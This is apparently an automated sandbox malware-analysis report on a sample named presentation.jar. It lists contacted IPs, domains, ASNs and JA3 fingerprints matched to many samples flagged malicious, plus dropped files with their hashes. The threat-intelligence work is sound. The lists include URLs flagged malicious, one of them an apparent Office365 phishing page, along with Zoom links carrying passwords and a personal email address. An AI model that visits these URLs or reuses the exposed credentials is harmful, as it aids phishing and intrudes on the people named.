34.202.206.65	http://www.openair.com	Get hash	malicious	Browse	prefmgr-cookie.truste-svc.net/cookie_js/cookie_iframe.html?parent=http://consent-pref.trustarc.com/?type=netsuite_production&site=netsuite.com&action=notice&country=ch&locale=en&behavior=expressed&layout=default_eu&irm=undefined&from=http://consent.trustarc.com/
35.181.18.61	http://23.129.64.206	Get hash	malicious	Browse	metrics.washingtonpost.com/b/ss/wpniwashpostcom/1/H.10-Pdvu-2/s35121958062326?[AQB]&ndh=1&t=2/11/2020%2021%3A42%3A33%203%20480&ns=wpni&pageName=wp%20-%20blog%20-%20/securityfix/2008/08/web_fraud_20_distributing_your.html&g=http%3A//voices.washingtonpost.com/securityfix/2008/08/web_fraud_20_distributing_your.html&cc=USD&ch=wp%20-%20technology&server=washingtonpost.com&events=event1&v1=wp%20-%20blog%20-%20/securityfix/2008/08/web_fraud_20_distributing_your.html&h1=technology%7Cblogs%7Csecurityfix&c2=wp%20-%20technology&v2=wp%20-%20technology&h2=washingtonpost.com%7Ctechnology%7Cblogs%7Csecurityfix&c3=blog&c4=washingtonpost.com&c5=brian%20krebs&v6=wp%20-%20blog%20-%20/securityfix/2008/08/web_fraud_20_tools.html&c8=Thursday&c9=12%3A30AM&c10=Weekday&v11=securityfix&v14=New&v15=First%20page%20view%20or%20cookies%20not%20supported&v16=1&c17=First%20page%20view%20or%20cookies%20not%20supported&c18=New&c23=technology%7Cblogs%7Csecurityfix&c25=securityfix&c32=application%20-%20movable%20type&c33=anonymous&c34=News&s=1280x1024&c=24&j=1.6&v=Y&k=Y&bw=1280&bh=906&p=Shockwave%20Flash%3B&[AQE]
35.181.18.61	http://technoraga.com/Doc.htm	Get hash	malicious	Browse	transurban.sc.omtrdc.net/b/ss/transurban-website-prd/10/JS-2.20.0-LAUN/s67471978777989?AQB=1&pccr=true&vidn=2FD976FD0515F365-60000B8424D9D8C2&ndh=1&pf=1&callback=s_c_il[1].doPostbacks&et=1&t=16%2F10%2F2020%2022%3A24%3A10%201%20480&d.&nsid=0&jsonv=1&.d&ce=UTF-8&ns=transurban&cdp=2&g=http%3A%2F%2Ftechnoraga.com%2FDoc.htm&c.&evt_customPageView=1&new_repeat=New&t_hour=4%3A24%20PM&t_day=Tuesday&p_pi_url=D%3Dg&get_load_time=53&p_pi_pageID=http%3A%2F%2Ftechnoraga.com%2FDoc.htm&p_pi_pageName=Login%20-%20Office365&p_pi_pageURL=http%3A%2F%2Ftechnoraga.com%2FDoc.htm&p_pi_brand=LINKT&p_pi_sysEnv=Desktop&p_pi_delayType=Normal&p_cat_primaryCategory=Login%20-%20Office365%20-%20Manage%20LINKT&version=1.0&vendor_GoogleAnalytics_account=UA-9250181-37&excCodes=1&.c&cc=AUD&server=technoraga.com&s=1280x1024&c=24&j=1.6&v=Y&k=N&bw=784&bh=554&AQE=1

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
consent-pref.trustarc.com	presentation.jar	Get hash	malicious	Browse	52.84.148.45
	presentation.jar	Get hash	malicious	Browse	13.225.93.123
	http://www.openair.com	Get hash	malicious	Browse	13.224.93.99
	https://online.pubhtml5.com/yjuu/ehxc/	Get hash	malicious	Browse	13.224.102.38
	https://go.servicenow.com/LP=9828?elqcampid=28164&cname=EM-eDM-ITAM-SAM-Nurture-20JUL20-AMS&elqTrackId=ccaddb8300774be5bf5454596900c46a&elq=2f40df029a4b4ce0957181eee902ee38&elqaid=37809&elqat=1&elqCampaignId=28164	Get hash	malicious	Browse	143.204.94.64
	https://go.servicenow.com/LP=9828?elqcampid=28164&cname=EM-eDM-ITAM-SAM-Nurture-20JUL20-AMS&elqTrackId=6874089d077d486d97b209b7a897287e&elq=2f40df029a4b4ce0957181eee902ee38&elqaid=37809&elqat=1&elqCampaignId=28164	Get hash	malicious	Browse	143.204.94.116
	http://santacruzcounty.us/	Get hash	malicious	Browse	13.224.95.109
	https://zoom.us/j/896762422?pwd=N3UvN2pHZURNWXhQYVdIZDN0T0JUQT09	Get hash	malicious	Browse	143.204.89.129
	OPEN.odt	Get hash	malicious	Browse	143.204.89.115
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	13.224.95.123
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	13.224.95.109
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	143.204.94.26
	http://www.realnikerunningshoes.com/nike-free-run-women-women-nike-free-40-v2-c-63_71.html	Get hash	malicious	Browse	13.227.223.124
	https://baylor.zoom.us/j/268358425?pwd=MW1jK0hQbU1jbXBhdEhPV05BZ3NDZz09&data=01\|01\|toby_barnett@baylor.edu\|12dc7fbb38a24468ed4f08d80882e94c\|22d2fb35256a459bbcf4dc23d42dc0a4\|0&sdata=mVw4ogjLNmcHPDOSI9ENKhErFYmq8RdmucjXGYYto2E=&reserved=0	Get hash	malicious	Browse	13.224.95.108
	DART%20-%20Session%20information%20and%20consent%20form_DCE%20bfbs.docx	Get hash	malicious	Browse	13.226.173.113
	https://us04web.zoom.us/j/78253099567?pwd=Ri9HSEFHWFFQTmdBWVlieDlSaGtYZz09	Get hash	malicious	Browse	143.204.97.112
	http://post.spmailtechnolo.com/f/a/B1XFtMT1p742evBsgYVh2w~~/AARLMwA~/RgRgXuRNP0QjaHR0cHM6Ly9kZWJyYXV3Lnpvb20udXMvai8zNzIxOTUwNzlXA3NwY0IKACZNX3xe5EwB91IZbWF0dGlqbi5zdG9ya0BkZWJyYXV3LmNvbVgEAAAAAg~~	Get hash	malicious	Browse	13.225.73.39
	https://zoom.us/j/99182168954?pwd=YlMzd2RXd3EzbWhrR3puK3ZZdmJxQT09	Get hash	malicious	Browse	143.204.97.23
	https://nyu.zoom.us/j/377217294	Get hash	malicious	Browse	143.204.97.79
	https://guidestone.zoom.us/j/142303505	Get hash	malicious	Browse	13.224.96.6
consent-st.trustarc.com	presentation.jar	Get hash	malicious	Browse	13.226.247.46
	presentation.jar	Get hash	malicious	Browse	143.204.202.115
	http://www.openair.com	Get hash	malicious	Browse	13.224.93.39
	https://online.pubhtml5.com/yjuu/ehxc/	Get hash	malicious	Browse	13.224.102.42
	https://go.servicenow.com/LP=9828?elqcampid=28164&cname=EM-eDM-ITAM-SAM-Nurture-20JUL20-AMS&elqTrackId=ccaddb8300774be5bf5454596900c46a&elq=2f40df029a4b4ce0957181eee902ee38&elqaid=37809&elqat=1&elqCampaignId=28164	Get hash	malicious	Browse	143.204.94.22
	https://go.servicenow.com/LP=9828?elqcampid=28164&cname=EM-eDM-ITAM-SAM-Nurture-20JUL20-AMS&elqTrackId=6874089d077d486d97b209b7a897287e&elq=2f40df029a4b4ce0957181eee902ee38&elqaid=37809&elqat=1&elqCampaignId=28164	Get hash	malicious	Browse	143.204.94.22
	http://santacruzcounty.us/	Get hash	malicious	Browse	13.224.95.23
	https://zoom.us/j/896762422?pwd=N3UvN2pHZURNWXhQYVdIZDN0T0JUQT09	Get hash	malicious	Browse	143.204.89.123
	OPEN.odt	Get hash	malicious	Browse	143.204.89.108
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	13.224.95.123
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	13.224.95.23
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	143.204.94.40
	http://www.realnikerunningshoes.com/nike-free-run-women-women-nike-free-40-v2-c-63_71.html	Get hash	malicious	Browse	13.227.223.29
	https://baylor.zoom.us/j/268358425?pwd=MW1jK0hQbU1jbXBhdEhPV05BZ3NDZz09&data=01\|01\|toby_barnett@baylor.edu\|12dc7fbb38a24468ed4f08d80882e94c\|22d2fb35256a459bbcf4dc23d42dc0a4\|0&sdata=mVw4ogjLNmcHPDOSI9ENKhErFYmq8RdmucjXGYYto2E=&reserved=0	Get hash	malicious	Browse	13.224.95.117
	DART%20-%20Session%20information%20and%20consent%20form_DCE%20bfbs.docx	Get hash	malicious	Browse	13.35.43.30
	https://us04web.zoom.us/j/78253099567?pwd=Ri9HSEFHWFFQTmdBWVlieDlSaGtYZz09	Get hash	malicious	Browse	143.204.97.127
	http://post.spmailtechnolo.com/f/a/B1XFtMT1p742evBsgYVh2w~~/AARLMwA~/RgRgXuRNP0QjaHR0cHM6Ly9kZWJyYXV3Lnpvb20udXMvai8zNzIxOTUwNzlXA3NwY0IKACZNX3xe5EwB91IZbWF0dGlqbi5zdG9ya0BkZWJyYXV3LmNvbVgEAAAAAg~~	Get hash	malicious	Browse	143.204.89.108
	https://zoom.us/j/99182168954?pwd=YlMzd2RXd3EzbWhrR3puK3ZZdmJxQT09	Get hash	malicious	Browse	143.204.97.86
	https://nyu.zoom.us/j/377217294	Get hash	malicious	Browse	143.204.97.94
	https://guidestone.zoom.us/j/142303505	Get hash	malicious	Browse	13.224.96.71

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	Tmw6ajHw6W.exe	Get hash	malicious	Browse	3.14.182.203
	New Financial Reports & Statements.html	Get hash	malicious	Browse	52.218.137.48
	609110f2d14a6.dll	Get hash	malicious	Browse	54.154.149.76
	945AEE9E799851EB1A2215FE1A60E55E41EB6D69EF4CB.exe	Get hash	malicious	Browse	3.14.18.91
	SWIFT 00395_IMG.exe	Get hash	malicious	Browse	3.34.109.201
	jH70i5mxJO.exe	Get hash	malicious	Browse	54.188.107.146
	3ZtdRsbjxo.exe	Get hash	malicious	Browse	104.192.141.1
	Documents_111651917_375818984.xls	Get hash	malicious	Browse	18.222.240.99
	4GGwmv0AJm.exe	Get hash	malicious	Browse	52.32.122.68
	c647b2da_by_Libranalysis.exe	Get hash	malicious	Browse	54.72.3.133
	#U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm	Get hash	malicious	Browse	143.204.98.42
	Documents_95326461_1831689059.xls	Get hash	malicious	Browse	3.134.106.170
	0d69e4f6_by_Libranalysis.xls	Get hash	malicious	Browse	99.83.154.118
	d630fc19_by_Libranalysis.xlsx	Get hash	malicious	Browse	52.219.40.51
	presupuesto.xlsx	Get hash	malicious	Browse	143.204.202.49
	Comand#U0103 de achizi#U021bie PP050321.exe	Get hash	malicious	Browse	3.34.241.29
	O1E623TjjW.exe	Get hash	malicious	Browse	52.52.155.86
	file.exe	Get hash	malicious	Browse	52.15.160.167
	PURCHASE ORDER.exe	Get hash	malicious	Browse	3.14.18.91
	80896e11_by_Libranalysis.exe	Get hash	malicious	Browse	3.141.142.211
UNIFIEDLAYER-AS-1US	GK58.vbs	Get hash	malicious	Browse	192.185.21.136
	catalog-1521295750.xlsm	Get hash	malicious	Browse	192.185.20.98
	catalog-1521295750.xlsm	Get hash	malicious	Browse	192.185.20.98
	4GGwmv0AJm.exe	Get hash	malicious	Browse	50.87.166.59
	c647b2da_by_Libranalysis.exe	Get hash	malicious	Browse	108.179.242.122
	c647b2da_by_Libranalysis.exe	Get hash	malicious	Browse	108.179.242.122
	6613n246zm543w.xlsb	Get hash	malicious	Browse	162.241.24.47
	DEMARG MALAYHCU21345.exe	Get hash	malicious	Browse	162.241.169.22
	generated check 662732.xlsm	Get hash	malicious	Browse	192.185.177.61
	4Y2I7k0.xlsb	Get hash	malicious	Browse	162.241.24.47
	QUOTATION REQUEST.exe	Get hash	malicious	Browse	192.185.131.134
	gunzipped.exe	Get hash	malicious	Browse	192.254.189.182
	Purchase Order #DH0124 REF#SCAN005452 EXW HMM SO#UKL080947 - FD210268-001.xlsx.exe	Get hash	malicious	Browse	162.144.13.239
	0145d964_by_Libranalysis.exe	Get hash	malicious	Browse	162.241.169.22
	HXxk3mzZeW.exe	Get hash	malicious	Browse	192.185.140.111
	HCU213DES.doc	Get hash	malicious	Browse	162.241.169.22
	RFQ.exe	Get hash	malicious	Browse	192.254.236.251
	a3aa510e_by_Libranalysis.exe	Get hash	malicious	Browse	192.185.221.204
	Outstanding Payment Plan.xls	Get hash	malicious	Browse	192.185.129.69
	FULL SOA $16848.exe	Get hash	malicious	Browse	192.185.113.120
AMAZON-AESUS	heUGqZXAJv.exe	Get hash	malicious	Browse	50.17.5.224
	2bb0000.exe	Get hash	malicious	Browse	50.16.249.42
	2f50000.exe	Get hash	malicious	Browse	23.21.48.44
	SecuriteInfo.com.Heur.31681.xls	Get hash	malicious	Browse	54.243.154.178
	MyUY1HeWNL.exe	Get hash	malicious	Browse	54.204.119.115
	Documents_111651917_375818984.xls	Get hash	malicious	Browse	54.163.9.216
	detection.exe	Get hash	malicious	Browse	3.212.215.225
	4GGwmv0AJm.exe	Get hash	malicious	Browse	52.202.22.6
	#U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm	Get hash	malicious	Browse	23.21.53.13
	OB74.vbs	Get hash	malicious	Browse	54.91.196.22
	3e98fa2d_by_Libranalysis.exe	Get hash	malicious	Browse	54.235.83.248
	file.exe	Get hash	malicious	Browse	3.223.115.185
	Outstanding Payment Plan.xls	Get hash	malicious	Browse	3.227.195.104
	0429_1556521897736.doc_berd.dll	Get hash	malicious	Browse	54.225.169.203
	KnAY2OIPI3	Get hash	malicious	Browse	54.161.176.221
	Bill Of Lading & Packing List.pdf.gz.exe	Get hash	malicious	Browse	3.223.115.185
	pVrqrGltiL.exe	Get hash	malicious	Browse	3.233.171.147
	b3516494_by_Libranalysis.xls	Get hash	malicious	Browse	3.223.115.185
	e3d5e715_by_Libranalysis.exe	Get hash	malicious	Browse	54.243.121.36
	presentation.jar	Get hash	malicious	Browse	34.202.206.65

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	ausgangsrechnung@condor.com_ProjectDocument.HTML	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	6ccd0000.bilper.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	6bae0000.bilper.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	6c130000.da.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	609110f2d14a6.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	valuePasteList.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	3ZtdRsbjxo.exe	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	Pro-Forma invoicve.html	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	#U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	6a9b0000.da.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	6ba90000.da.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	s.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	setup-lightshot.exe	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	s.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	EAGLE.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	a4.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	b75e7348_by_Libranalysis.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	Purchase Order comfirmation to issue INVOICE.html	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	0429_1556521897736.doc_berd.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
	M3f3pIfDgg.dll	Get hash	malicious	Browse	143.204.98.126 34.202.206.65 13.224.193.90 35.181.18.61 143.204.98.25
d2935c58fe676744fecc8614ee5356c7	Payment Advice-BCS_ECS9522020909153934_3159_952.jar	Get hash	malicious	Browse	50.87.249.219
	Payment Advice-BCS_ECS9522020909153934_3159_952.jar	Get hash	malicious	Browse	50.87.249.219
	DHL Notification.jar	Get hash	malicious	Browse	50.87.249.219
	RFQ 00234567828723635387632988822.jar	Get hash	malicious	Browse	50.87.249.219
	RFQ 00234567828723635387632988822.jar	Get hash	malicious	Browse	50.87.249.219
	Annexure A-61322.jar	Get hash	malicious	Browse	50.87.249.219
	EPC Works for AMAALA AIRFIELD PROJECT - WORK .jar	Get hash	malicious	Browse	50.87.249.219
	Voicemail.jar	Get hash	malicious	Browse	50.87.249.219
	presentation.jar	Get hash	malicious	Browse	50.87.249.219
	presentation.jar	Get hash	malicious	Browse	50.87.249.219
	Scan_Document.jar	Get hash	malicious	Browse	50.87.249.219
	FedEx 320002127812100.jar	Get hash	malicious	Browse	50.87.249.219
	RFQ- 100400806 supp. 02.jar	Get hash	malicious	Browse	50.87.249.219
	Company_Information_ Tax Number.jar	Get hash	malicious	Browse	50.87.249.219
	SBA.DOC.jar	Get hash	malicious	Browse	50.87.249.219
	Payment Advice-BCS_ECS9522020090915390034_3159_952.jar	Get hash	malicious	Browse	50.87.249.219
	Payment Advice Note from 2021 04 26.jar	Get hash	malicious	Browse	50.87.249.219
	SKMC258201001130020005057.jar	Get hash	malicious	Browse	50.87.249.219
	SKMC258201001130020005057.jar	Get hash	malicious	Browse	50.87.249.219
	Purchase Order AMG 4530000463.jar	Get hash	malicious	Browse	50.87.249.219

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Oracle\Java\.oracle_jre_usage\cce3fe3b0d8d83e2.timestamp Download File
Process:	C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.883083602104782
Encrypted:	false
SSDEEP:	3:oFj4I5vpN6yUb9v:oJ5X6yM9v
MD5:	EEFF30BBF0C67371F48EEE3407A089BB
SHA1:	36EFF215C719819554DF03D56A46620B6FC82E76
SHA-256:	C898F1014F0A3DEDF508049E9FCC06AA281D80ADE1B77BAD714A7436A8D6A257
SHA-512:	12AB6C147B207A0C4E046B68C95FFEB1D2BDCD6EBEE3C40D384ED4149F2DE4F558EF5B6868999E11D1F34922C747107640CD9603ABEDD0CEB577EB01A7733731
Malicious:	false
Reputation:	low
Preview:	C:\Program Files (x86)\Java\jre1.8.0_211..1620156904325..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\6BAUBVPU\consent-pref.trustarc[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Reputation:	high, very likely benign file
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\EQAWN5DV\www.java[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2344
Entropy (8bit):	5.582688811475928
Encrypted:	false
SSDEEP:	48:0F7QC4gJnrC4g6tbzrC4g6zrbPrC4gArC4gUTre5crC4gUTreA4rC4gULZ5gregE:yvDFmD6tbzmD6XbPmDAmDU3eGmDU3elR
MD5:	86779E4610AF3A4DD0BF25F46B1F907A
SHA1:	D0778BA0FEEBABD718861374CEB8E8119F104760
SHA-256:	427F79BC38D80E7F42B982547548B7D0398E6A79C16FBDC9889D4C29FA1C7572
SHA-512:	2A5DABD21B1E24F58967F3965D1ECD2F8EF7FB9BC95279035C6CFF5B810DAD2B4822726448EA15F1A193CDFD310BBAE6314C7B463A8AFBBDE5FDE46B46C15AD4
Malicious:	false
Reputation:	low
Preview:	<root></root><root></root><root><item name="_boomr_clss" value="_boomr_clss" ltime="2551081296" htime="30884124" /></root><root></root><root></root><root></root><root></root><root></root><root><item name="ORA_COOK_STORE" value="{"ORA_FPC":"ORA_FPC=id=c88cb888-8299-4c9f-be25-c5fe269087f4; expires=Fri, 05 May 2023 07:12:42 GMT; path=/"}" ltime="2567051296" htime="30884124" /></root><root><item name="ORA_COOK_STORE" value="{"ORA_FPC":"ORA_FPC=id=c88cb888-8299-4c9f-be25-c5fe269087f4; expires=Fri, 05 May 2023 07:12:42 GMT; path=/","test_cookie42570":"test_cookie42570=cookie;domain=.com;path=/;expires=Wed, 05 May 2021 19:35:11 GMT"}" ltime="2567211296" htime="30884124" /></root><root><item name="ORA_COOK_STORE" value="{"ORA_FPC":"ORA_FPC=id=c88cb888-8299-4c9f-be25-c5fe269087f4; expires=Fri, 05 May 2023 07:12:42 GMT; path=/","test_cookie42570":"test_cookie42570=cookie;domain=.java.com;path=/;expires

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\IB42RK38\consent.trustarc[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Reputation:	high, very likely benign file
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D4340500-AD0F-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	38488
Entropy (8bit):	1.8885640332840004
Encrypted:	false
SSDEEP:	192:rwZcZb2iW5tjtfjretjr7MPWWcr7SWcr2YfWcr2EMrWcr2ISfWcr20brWcr2kg:rgcyBrRO1Cj4eFs
MD5:	AC390E87E72A3233932DB281D5634CA0
SHA1:	CCE82F4E34EB1944BC0F95EC3CE9D5F862101619
SHA-256:	03C8DE80369681C51C5343B629143BA8C5E42899E92D5EF3EE82E96AEEC0A924
SHA-512:	4239A49D55B5D11C11031B971AA5DB9DAFE35B6F46DC9468D95007B46713013FA5AD76A1112E8E1270AEA36F5B1822BAB49DDF17141021DA50B96FFCA31D2050
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{D4340502-AD0F-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	123314
Entropy (8bit):	3.581575794227069
Encrypted:	false
SSDEEP:	384:rmeEeWamPkgggxmU9AHWFzDpFmAPpR1EXYR1V6XwR1uLSZfPnzZTZ1ZqZG0Z7ZPL:wmU9A2Fz9nnLqWKwjslcya3O
MD5:	7F7C0BDCB075A55086910CCEEC5A4FD5
SHA1:	0B6028D745775F8B9C29017BD55181E274D4F68E
SHA-256:	B6B75B96953276E6EECF27AF7F54DF9D61D54313777ABD05219D24C58FF52806
SHA-512:	0B113576A9F20197D3648A67DC75BCF449123F11BAE3DAEE9FEFAD2FCF6B06DA84928581BF0EE2D952C265ACB041C4A420F0990647A8849F88FBD46258F49E27
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{D4340503-AD0F-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5859393622568259
Encrypted:	false
SSDEEP:	48:Iw0GcprJGwpaF+nG4pQn+1GrapbSHZGQpKzG7HpRgaTGIpX2pmGApm:roZjQW6EBSHzACTgeFfg
MD5:	C17E500288F01500199EEAD49529FEC4
SHA1:	223208B644DB83CF910BC94802B9469B6439F4B0
SHA-256:	8C5EF54DE8A9C31E845F92157E4B0E746032E676AED168F043F003EB6911689B
SHA-512:	C58CA899574D63A8F82CC25797F6E984DD0565521E00D771BC992F6447FE9F02384AD60EBA85D70BE0A7126DEA554EBD75F3FC4674988966C88902DBF6A47DAE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.096309758043222
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEsiQ4nWimI002EtM3MHdNMNxOEsiQ4nWimI00OVbVbkEtMb:2d6NxOT14SZHKd6NxOT14SZ7V6b
MD5:	29F0AB4CFC5C4DD9107914708E354AF4
SHA1:	47ED74696A2865CB227C110A49A86F30C6B42535
SHA-256:	466390415D730507ECA6C96B77BB5B2F9F6003A5C8538A439CC2CB353192461C
SHA-512:	AAA544100BD68ACB3916141546971319442C929F69F925C72184BA152D815FA49258431FD68B23BDBFABF790D91B7101237771582FF60D78247272B33293121A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa9f63655,0x01d7411c</date><accdate>0xa9f63655,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa9f63655,0x01d7411c</date><accdate>0xa9f63655,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.089462805155766
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kQDMjnWimI002EtM3MHdNMNxe2kQDMjnWimI00OVbkak6EtMb:2d6NxrRojSZHKd6NxrRojSZ7VAa7b
MD5:	E402141EAAD399B4884778339A41B810
SHA1:	B67F666771DE9D14797847D73EAF8F6B8E1E053A
SHA-256:	5EF7CB572927F3B33520360FB70E049DD6EA3875145BF4BED4E1EA42C250A406
SHA-512:	25BA215DA2594BAC7ECD49C439CB7AA426780CB04A67B18CC77E7BDA80AFC182B518673D506208D1BF9BD03E18BEAE14F1611317D635F62526E15748E170B145
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xa9ef0f52,0x01d7411c</date><accdate>0xa9ef0f52,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xa9ef0f52,0x01d7411c</date><accdate>0xa9ef0f52,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	665
Entropy (8bit):	5.1154098558726036
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLsiQ4nWimI002EtM3MHdNMNxvLsiQijnWimI00OVbmZEtMb:2d6Nxvw14SZHKd6Nxvw1USZ7Vmb
MD5:	162A12B46645F6FA8CC95A245CDCB986
SHA1:	F4FD7144027DF8B4F17B673BC01BB04EBEBEA30A
SHA-256:	5E2824CE0D9A876923BD780F7F3C9C501A5223BA469C17156DFC5ECE2AFFECB8
